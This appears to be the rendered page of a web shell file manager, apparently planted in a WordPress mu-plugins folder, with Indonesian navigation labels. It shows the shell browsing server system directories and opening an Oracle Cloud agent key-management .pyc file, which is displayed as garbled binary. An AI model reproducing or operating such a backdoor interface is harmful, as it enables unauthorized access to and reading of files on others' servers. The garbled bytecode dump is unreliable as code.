📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
key_management
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/key_management/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: generated_key.pyc
a O��f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s~ e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z d d� Z dd� Zdd� ZdS )�GeneratedKeyz GeneratedKey model. c K s2 dddd�| _ dddd�| _d| _d| _d| _dS )a~ Initializes a new GeneratedKey object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param ciphertext: The value to assign to the ciphertext property of this GeneratedKey. :type ciphertext: str :param plaintext: The value to assign to the plaintext property of this GeneratedKey. :type plaintext: str :param plaintext_checksum: The value to assign to the plaintext_checksum property of this GeneratedKey. :type plaintext_checksum: str �str)� ciphertext� plaintext�plaintext_checksumr r �plaintextChecksumN)� swagger_types� attribute_map�_ciphertext� _plaintext�_plaintext_checksum)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/key_management/models/generated_key.py�__init__ s ��zGeneratedKey.__init__c C s | j S )z� **[Required]** Gets the ciphertext of this GeneratedKey. The encrypted data encryption key generated from a master encryption key. :return: The ciphertext of this GeneratedKey. :rtype: str �r �r r r r r 2 s zGeneratedKey.ciphertextc C s || _ dS )z� Sets the ciphertext of this GeneratedKey. The encrypted data encryption key generated from a master encryption key. :param ciphertext: The ciphertext of this GeneratedKey. :type: str Nr )r r r r r r >